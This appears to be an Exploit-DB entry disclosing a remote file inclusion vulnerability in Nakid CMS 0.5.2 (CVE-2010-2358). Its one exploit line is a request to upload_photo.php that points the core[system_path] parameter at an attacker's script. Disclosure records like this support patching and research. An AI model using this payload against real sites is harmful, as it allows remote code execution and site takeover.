Nakid CMS 0.5.2 - Remote File Inclusion

Author: sh00t0ut
type: webapps
platform: php
port: 
date_added: 2010-06-15  
date_updated:   
verified: 0  
codes: CVE-2010-2358;OSVDB-65543  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comNakidCMSv_0_5_2.rar  

raw file: 13889.txt  

[~] Nakid CMS 0.5.2 Remote Include Exploit
[~] Found by sh00t0ut
[~] Expl: http://[victim]/modules/catalog/upload_photo.php?core[system_path]=[evil script]